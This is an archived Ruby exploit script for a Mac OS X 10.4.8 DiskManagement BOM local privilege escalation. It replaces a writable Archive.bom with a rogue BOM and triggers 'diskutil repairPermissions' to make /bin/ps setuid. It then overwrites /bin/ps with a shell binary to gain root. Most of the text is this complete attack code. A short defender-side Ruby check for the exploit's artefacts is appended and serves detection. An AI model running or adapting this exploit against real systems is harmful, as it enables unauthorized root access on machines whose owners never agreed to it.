Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit

#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
#          Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz"   - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#

require 'fileutils'

# Basic configuration
TARGET_BINARY      = "/bin/ps"      # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH = "/tmp/ps2"     # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH  = "/usr/bin/id"  # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH    = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH      = "/usr/sbin/diskutil"
TEH_EVIL_BOM       = File.read("Evil.bom")

#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
  puts "++ Repairing (moving back-ups to original path)"
  puts "++ #{File.basename(BOMARCHIVE_PATH)}"
  FileUtils.rm_f BOMARCHIVE_PATH
  FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH

  puts "++ #{TARGET_BINARY}"
  FileUtils.rm_f TARGET_BINARY
  FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY

  puts "++ Removing back-ups..."
  FileUtils.rm_f TARGET_BACKUP_PATH
  FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))

  puts "++ Done. Repairing disk permissions..."
  exec "#{DISKUTIL_PATH} repairPermissions /"
end

#
# Overwrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
  puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."

  # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
  # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
  # An alternative method is running diskutil again to set the rogue permissions.
  over = File.new(TARGET_BINARY, "w")
  over.write(File.read(TARGET_SHELL_PATH))
  over.close

  unless FileTest.setuid?(TARGET_BINARY)
    fork do
      FileUtils.rm_f TARGET_BINARY
      FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
      exec "#{DISKUTIL_PATH} repairPermissions /"
    end
    Process.wait
  end

  puts "++ Done. Happy ruuting."
end

#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
  puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"

  # Back-up the original Archive.bom, set mode to 777
  if FileTest.writable?(BOMARCHIVE_PATH)
    backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))

    unless FileTest.exist?(backup_path)
      puts "++ Creating backup copy at #{backup_path}"
      FileUtils.cp BOMARCHIVE_PATH, backup_path
    end

    puts "++ Removing original file."
    FileUtils.rm_f BOMARCHIVE_PATH

    puts "++ Writing backdoor BOM file."
    target_bom = File.new(BOMARCHIVE_PATH, "w")
    target_bom.write(TEH_EVIL_BOM)
    target_bom.close
    puts "++ Done."
  else
    puts "-- Can't write to '#{BOMARCHIVE_PATH}'. No pwnage for you today."
    exit
  end

  # Back-up the target backdoor path
  unless FileTest.exist?(TARGET_BACKUP_PATH)
    puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
    FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
  end

  # Let diskutil do its job (set permissions over target binary path, setuid)
  puts "++ Running diskutil to set the new permissions for the backdoor..."
  fork do
    exec "#{DISKUTIL_PATH} repairPermissions /"
  end
  Process.wait

  puts "++ Somebody set up us the bomb!"
  exploit_bomb()
end

# Here be pwnies
if ARGV[0] == "repair"
  do_repair()
else
  set_up_the_bomb()
end

# milw0rm.com [2007-01-05]
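A defender-side check for the conditions this exploit depends on and the artefacts it leaves behind, added here as an example and not part of the original exploit: a world-writable Archive.bom (the precondition the script tests with FileTest.writable?), the backup copies it drops in /tmp, and a setuid target binary after diskutil has applied the rogue BOM. The paths are parameters so the check can be run against any directory; the defaults in the main block are the ones from the script above.

```ruby
# Inspects the artefacts the exploit above relies on or leaves behind:
#  - a world-writable Archive.bom (the precondition FileTest.writable? tests)
#  - the backups it drops in /tmp (TARGET_BACKUP_PATH and a copy of Archive.bom)
#  - a setuid target binary, the effect of diskutil honouring the rogue BOM
# Returns a list of human-readable findings; an empty list means none found.
def bom_exploit_indicators(bom_path:, target_binary:, backup_path:, bom_backup:)
  findings = []

  if File.exist?(bom_path)
    mode = File.stat(bom_path).mode & 0o777
    if mode & 0o002 != 0
      findings << format("%s is world-writable (mode %o)", bom_path, mode)
    end
  end

  [backup_path, bom_backup].each do |path|
    findings << "leftover backup #{path} present" if File.exist?(path)
  end

  if File.exist?(target_binary)
    st = File.stat(target_binary)
    if st.setuid?
      findings << format("%s is setuid (owner uid %d)", target_binary, st.uid)
    end
  end

  findings
end

# Run against the paths used by the exploit script on this page.
if __FILE__ == $0
  hits = bom_exploit_indicators(
    bom_path:      "/Library/Receipts/Essentials.pkg/Contents/Archive.bom",
    target_binary: "/bin/ps",
    backup_path:   "/tmp/ps2",
    bom_backup:    "/tmp/Archive.bom"
  )
  puts(hits.empty? ? "no indicators found" : hits)
end
```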
MoAB 01/05/2007